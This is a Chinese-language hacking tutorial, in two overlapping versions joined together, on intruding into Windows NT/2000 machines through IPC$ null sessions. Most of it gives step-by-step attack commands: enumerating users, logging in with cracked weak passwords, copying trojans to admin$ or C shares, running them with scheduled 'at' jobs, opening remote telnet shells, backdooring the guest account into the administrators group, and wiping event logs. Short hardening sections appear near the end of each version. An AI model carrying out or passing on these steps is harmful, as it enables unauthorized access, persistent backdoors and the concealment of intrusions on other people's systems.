黑客教程[3]

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表


三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的 
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.


四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
  

五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因： 
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限； 
错误号51，Windows 无法找到网络路径 : 网络有问题； 
错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； 
错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$； 
错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。 
错误号1326，未知的用户名或错误密码 ： 原因很明显了； 
错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况） 
错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。 
关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就*大家自己体会和试验了.


六  如何打开目标的IPC$(此段引自相关文章) 
首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。 


七  如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1）察看本地共享资源
运行-cmd-输入net share
2）删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）
3）停止server服务
net stop server /y （重新启动后server服务会重新开启）
4）修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。 
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。 
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。 

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码，防止通过ipc$穷举密码


八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:""        (一定要注意:这一行命令中包含了3个空格) 

2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码"     (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名"       (即可将对方的c盘映射为自己的z盘，其他盘类推)
如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del 

5)删除共享映射
net use c: /del 删除映射的c盘，其他盘类推 
net use * /del 删除全部,会有提示要求按y确认


九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈) 

11. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 
一般用流光，通过扫描弱口令来得到，管理员帐号和密码.
2. C:\>copy srv.exe \\127.0.0.1\admin$ 
先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
　　
3. C:\>net time \\127.0.0.1 
查查时间，发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00，命令成功完成。
　　
4. C:\>at \\127.0.0.1 11:05 srv.exe 
用at命令启动srv.exe吧

5. C:\>net time \\127.0.0.1
再查查到时间没有？如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05，那就准备开始下面的命令。
　　
6. C:\>telnet 127.0.0.1 99 
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
　　
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
　　
8. C:\WINNT\system32>ntlm 
输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！ 

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组    
10. C:\>net user guest /active:yes 
将对方的Guest用户激活

11. C:\>net user guest 1234 
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add 
将Guest变为Administrator(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机) 
ipc$详细解释大全
一 前言 

网上关于ipc$入侵的文章可谓多如牛毛，而且也不乏优秀之作，攻击步骤甚至可以说已经成为经典的模式，因此也没人愿意再把这已经成为定式的东西拿出来摆弄。 
不过话虽这样说，但我个人认为这些文章讲解的并不详细，对于第一次接触ipc$的菜鸟来说，简单的罗列步骤并不能解答他们的种种迷惑（你随便找一个hack论坛搜一下ipc$，看看存在的疑惑有多少）。因此我参考了网上的一些资料，教程以及论坛帖子，写了这篇总结性质的文章，想把一些容易混淆，容易迷惑人的问题说清楚，让大家不要总徘徊在原地! 
注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列，而鉴于win Xp在安全设置上有所提高，个别操作并不适用，有机会将单独讨论。 


二 什么是ipc$ 


IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些， 微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。 
平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指 微软自己安置的那个‘后门’：空会话（Null session）。那么什么是空会话呢？ 


三 什么是空会话 


在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。 
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下： 
1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建立； 
2）服务器产生一个随机的64位数（实现挑战）传送回客户； 
3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结果返回到服务器（实现响应）； 
4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。 
以上是一个安全会话建立的大致过程，那么空会话又如何呢？ 

空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组： 
Everyone 
Network 
在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？ 


四 空会话可以做什么 


对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令： 


1 首先，我们先建立一个空会话（需要目标开放ipc$） 
命令：net use \\ip\ipc$ "" /user:"" 
注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。 


2 查看远程主机的共享资源 
命令：net view \\IP 
解释：建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下类似类似结果： 
在 \\*.*.*.*的共享资源 
资源共享名 类型 用途 注释 

----------------------------------------------------------- 
NETLOGON Disk Logon server share 
SYSVOL Disk Logon server share 
命令成功完成。 


3 查看远程主机的当前时间 
命令：net time \\IP 
解释：用此命令可以得到一个远程主机的当前时间。 


4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT） 
nbtstat -A IP 
用此命令可以得到一个远程主机的NetBIOS用户名列表（需要你的netbios支持），返回如下结果： 

Node IpAddress: [*.*.*.*] Scope Id: [] 

NetBIOS Remote Machine Name Table 

Name Type Status 
--------------------------------------------- 
SERVER <00> UNIQUE Registered 
OYAMANISHI-H <00> GROUP Registered 
OYAMANISHI-H <1C> GROUP Registered 
SERVER <20> UNIQUE Registered 
OYAMANISHI-H <1B> UNIQUE Registered 
OYAMANISHI-H <1E> GROUP Registered 
SERVER <03> UNIQUE Registered 
OYAMANISHI-H <1D> UNIQUE Registered 
..__MSBROWSE__.<01> GROUP Registered 
INet~Services <1C> GROUP Registered 
IS~SERVER......<00> UNIQUE Registered 

MAC Address = 00-50-8B-9A-2D-37 

以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的操作会在EventLog中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？ 


五 ipc$所使用的端口 


首先我们来了解一些基础知识： 
1 SMBServer Message Block) Windows协议族，用于文件打印共享的服务； 
2 NBTNETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。 
3 在WindowsNT中SMB基于NBT实现，而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。 

有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了： 

对于win2000客户端来说： 
1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败； 
2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。由此可见，禁止了NBT后的win 2000对win NT的共享访问将会失败。 


对于win2000服务器端来说： 
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放； 
2 如果禁止NBT，那么只有445端口开放。 


我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。 


六 ipc$连接在hack攻击中的意义 


就像上面所说的，即使你建立了一个空的连接，你也可以获得不少的信息（而这些信息往往是入侵中必不可少的），如果你能够以某一个具有一定权限的用户身份登陆的话，那么你就会得到相应的权限，显然，如果你以管理员身份登陆,嘿嘿,那你可就了不得了，基本上可以为所欲为了。不过你也不要高兴的太早，因为管理员的密码不是那么好搞到的，虽然会有一些粗心的管理员存在弱口令，但这毕竟是少数，而且现在不比从前了，随着人们安全意识的提高，管理员们也愈加小心了，得到管理员密码将会越来越难的，因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接，甚至在主机不开启ipc$共享时，你根本就无法连接，你会慢慢的发现ipc$连接并不是万能的，所以不要奢望每次连接都能成功，那是不现实的。 
是不是有些灰心？倒也不用,关键是我们要摆正心态，不要把ipc$入侵当作终极武器，不要认为它战无不胜,它只是很多入侵方法中的一种，你有可能利用它一击必杀，也有可能一无所获，这些都是正常的，在黑客的世界里，不是每条大路都能通往罗马，但总有一条路会通往罗马，耐心的寻找吧！ 


七 ipc$连接失败的常见原因 

以下是一些常见的导致ipc$连接失败的原因： 


1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的； 


2 如果想成功的建立一个ipc$连接，就需要对方开启ipc$共享，即使是空连接也是这样，如果对方关闭了ipc$共享，你将会建立失败； 


3 你未启动Lanmanworkstation服务，它提供网络链结和通讯，没有它你无法发起连接请求（显示名为：Workstation）； 


4 对方未启动Lanmanserver服务，它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它远程主机将无法响应你的连接请求（显示名为：Server）； 


5 对方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份； 


6 对方禁止了NBT（即未打开139端口）； 


7 对方防火墙屏蔽了139和445端口； 


8 你的用户名或者密码错误（显然空会话排除这种错误）； 


9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可； 


10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。 


另外,你也可以根据返回的错误号分析原因： 
错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限； 
错误号51，Windows无法找到网络路径：网络有问题； 
错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； 
错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$； 
错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连； 
错误号1326，未知的用户名或错误密码：原因很明显了； 
错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动； 
错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。 


八 复制文件失败的原因 
1 盲目复制 
这类错误出现的最多，占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况，不要认为ipc$连接建立成功了就一定有共享文件夹。 

2 默认共享判断错误 
这类错误也是大家经常犯的，主要有两个小方面： 

1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向admin$之类的默认共享复制文件，导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享并不是ipc$共享的必要条件； 

2）由于net view \\IP 无法显示默认共享（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生） 

3用户权限不够，包括四种情形： 
1）空连接向所有共享（默认共享和普通共享）复制时，大多情况下权限是不够的； 
2）向默认共享复制时，要具有管理员权限； 
3）向普通共享复制时，要具有相应权限（即对方事先设定的访问权限）； 
4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享； 

还需要说明一点：不要认为administrator就一定是管理员，管理员名称是可以改的。 


4被防火墙杀死或在局域网 
也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；还有可能你把木马复制到了局域网内的主机，导致连接失败。因此建议你复制时要小心，否则就前功尽弃了。 


呵呵，大家也知道，ipc$连接在实际操作过程中会出现千奇百怪的问题，上面我所总结的只是一些常见错误，没说到的，只能让大家自己去体会了。 


九 如何打开目标的IPC$共享以及其他共享 


目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等，然后在shell下执行net share ipc$来开放目标的ipc$，用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹，你可以用net share baby=c:\，这样就把它的c盘开为共享名为baby共享了。 


十 一些需要shell才能完成的命令 


看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令： 

1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成； 

2 打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成； 

3 运行/关闭远程主机的服务，需要在shell下完成； 

4 启动/杀掉远程主机的进程，也需要在shell下完成。 


十一 入侵中可能会用到的相关命令 


请注意命令适用于本地还是远程，如果适用于本地，你只能在获得远程主机的shell后，才能向远程主机执行。 

1 建立空连接: 
net use \\IP\ipc$ "" /user:"" 

2 建立非空连接: 
net use \\IP\ipc$ "psw" /user:"account" 

3 查看远程主机的共享资源（但看不到默认共享） 
net view \\IP 

4 查看本地主机的共享资源（可以看到本地的默认共享） 
net share 

5 得到远程主机的用户名列表 
nbtstat -A IP 

6 得到本地主机的用户列表 
net user 

7 查看远程主机的当前时间 
net time \\IP 

8 显示本地主机当前服务 
net start 

9 启动/关闭本地服务 
net start 服务名 /y 
net stop 服务名 /y 

10 映射远程共享: 
net use z: \\IP\baby 
此命令将共享名为baby的共享资源映射到z盘 

11 删除共享映射 
net use c: /del 删除映射的c盘，其他盘类推 
net use * /del /y删除全部 

12 向远程主机复制文件 
copy \路径\srv.exe \\IP\共享目录名，如： 
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内 

13 远程添加计划任务 
at \\ip 时间 程序名，如： 
at \\127.0.0.0 11:00 love.exe 
注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径 


14 开启远程主机的telnet 
这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求： 

1）目标开启了ipc$共享 
2）你要拥有管理员密码和帐号 
3）目标开启RemoteRegistry服务，用户就该ntlm认证 
4）对WIN2K/XP有效，NT未经测试 
命令格式：OpenTelnet.exe \\server account psw NTLM认证方式 port 
试例如下：c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90 

15 激活用户/加入管理员组 
1 net uesr account /active:yes 
2 net localgroup administrators account /add 

16 关闭远程主机的telnet 
同样需要一个小程序：ResumeTelnet.exe 
命令格式：ResumeTelnet.exe \\server account psw 
试例如下：c:\>ResumeTelnet.exe \\*.*.*.* administrator "" 

17 删除一个已建立的ipc$连接 
net use \\IP\ipc$ /del 


（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创http://ccbirds.yeah.net） 


十二 ipc$完整入侵步骤祥解 

其实入侵步骤随个人爱好有所不同，我就说一下常见的吧，呵呵，献丑了！ 

1 用扫描软件搜寻存在若口令的主机，比如流光，SSS，X-scan等，随你的便，然后锁定目标，如果扫到了管理员权限的口令，你可以进行下面的步骤了，假设你现在得到了administrator的密码为空 


2 此时您有两条路可以选择：要么给对方开telnet（命令行）,要么给它传木马（图形界面），那我们就先走telnet这条路吧 


3上面开telnet的命令没忘吧，要用到opentelnet这个小程序 
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90 
如果返回如下信息 
******************************************************* 
Remote Telnet Configure, by refdom 
Email: refdom@263.net 
OpenTelnet.exe 

UsagepenTelnet.exe \\server username password NTLMAuthor telnetport 
******************************************************* 
Connecting \\192.168.21.*...Successfully! 

NOTICE!!!!!! 
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23 

Starting telnet service... 
telnet service is started successfully! telnet service is running! 

BINGLE!!!Yeah!! 
Telnet Port is 90. You can try:"telnet ip 90", to connect the server! 
Disconnecting server...Successfully! 
*说明你已经打开了一个端口90的telnet。 


4 现在我们telnet上去 
telnet 192.168.21.* 90 
如果成功，你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了，那么做点什么呢？把guest激活再加入管理组吧，就算留个后门了 


5 C:\>net user guest /active:yes 
*将Guest用户激活，也有可能人家的guest本来就试活的，你可以用net user guest看一下它的帐户启用的值是yes还是no 


6 C:\>net user guest 1234 
*将Guest的密码改为1234,或者改成你喜欢的密码 


7 C:\>net localgroup administrators guest /add 
*将Guest变为Administrator，这样，即使以后管理员更改了他的密码，我们也可以用guest登录了，不过也要提醒您，因为通过安全策略的设置，可以禁止guest等帐户的远程访问，呵呵，如果真是这样，那我们的后门也就白做了，愿上帝保佑Guest。 


8 好了，现在我们来走另一条路，给它传个木马玩玩 


9 首先，我们先建立起ipc$连接 
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator 


10 既然要上传东西，就要先知道它开了什么共享 
C:\>net view \\192.168.21.* 
在 \\192.168.21.*的共享资源 
资源共享名 类型 用途 注释 

----------------------------------------------------------- 
C Disk 
D Disk 
命令成功完成。 
*好了，我们看到对方共享了C,D两个盘，我们下面就可以向任意一个盘复制文件了。再次声明，因为用net view命令无法看到默认共享，因此通过上面返回的结果，我们并不能判断对方是否开启了默认共享。 


11 C:\>copy love.exe \\192.168.21.*\c 
已复制 1 个文件 
*用这个命令你可以将木马客户端love.exe传到对方的c盘下，当然，如果能复制到系统文件夹下是最好的了，不容易被发现 


12 运行木马前，我们先看看它现在的时间 
net time \\192.168.21.* 
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00 
命令成功完成 


13 现在我们用at运行它吧，不过对方一定要开了Task Scheduler服务（允许程序在指定时间运行），否则就不行了 
C:\>at \\192.168.21.* 11:02 c:\love.exe 
新加了一项作业，其作业 ID = 1 


14 剩下就是等了，等过了11:02，你就可以用控制端去连接了，如果成功你将可以用图形界面去控制远程主机了，如果连接失败，那么它可能在局域网里，也可能程序被防火墙杀了，还可能它下线了（没这么巧吧），无论哪种情况你只好放弃了 


嗯，好了，两种基本方法都讲了。如果你对上面的操作已经轻车熟路了，也可以用更高效的套路，比如用CA克隆guest，用p***ec执行木马，用命令：p***ec \\tergetIP -u user -p paswd cmd.exe直接获得shell等，这些都是可以得，随你的便。不过最后不要忘了把日志清理干净，可以用榕哥的elsave.exe。 
讲了ipc$的入侵，就不能不说如何防范，那么具体要怎样做呢？看下面 
十三 如何防范ipc$入侵 


1 禁止空连接进行枚举(此操作并不能阻止空连接的建立) 

方法1： 
运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1 
如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但限制通过这种连接得到列举SAM帐号和共享等信息；在Windows 2000 中增加了"2"，限制所有匿名访问除非特别授权，如果设置为2的话,可能会有一些其他问题发生，建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。 

方法2： 
在本地安全设置－本地策略－安全选项－在'对匿名连接的额外限制'中做相应设置 


2 禁止默认共享 

1）察看本地共享资源 
运行-cmd-输入net share 

2）删除共享（重起后默认共享仍然存在） 
net share ipc$ /delete 
net share admin$ /delete 
net share c$ /delete 
net share d$ /delete（如果有e,f,……可以继续删除） 

3）停止server服务 
net stop server /y （重新启动后server服务会重新开启） 

4）禁止自动打开默认共享（此操作并未关闭ipc$共享） 
运行-regedit 

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。 

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。 
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。这两个键值在默认情况下在主机上是不存在的，需要自己手动添加。 


3 关闭ipc$和默认共享依赖的服务erver服务 
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用 这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于lanmanserver，不要管它。 


4 屏蔽139，445端口 
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。 

1）139端口可以通过禁止NBT来屏蔽 
本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项 

2）445端口可以通过修改注册表来屏蔽 
添加一个键值 
Hive: HKEY_LOCAL_MACHINE 
Key: System\Controlset\Services\NetBT\Parameters 
Name: SMBDeviceEnabled 
Type: REG_DWORD 
Value: 0 
修改完后重启机器 

注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。 


3）安装防火墙进行端口过滤 


5 设置复杂密码，防止通过ipc$穷举出密码。 


十四 ipc$入侵问答精选 


上面说了一大堆的理论东西，但在实际中你会遇到各种各样的问题，因此为了给予大家最大的帮助，我看好几个安全论坛，找了n多的帖子，从中整理了一些有代表性的问答，其中的一些答案是我给出的，一些是论坛上的回复，如果有什么疏漏和错误，还请包涵。 


1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？ 

答：留下记录是一定的，你走后用程序删除就可以了，或者用肉鸡入侵。 


2.你看下面的情况是为什么，可以连接但不能复制 
net use \\***.***.***.***\ipc$ "密码" /user:"用户名" 
命令成功 
copy icmd.exe \\***.***.***.***\admin$ 
找不到网络路径 
命令不成功 

答：可能有两个原因： 
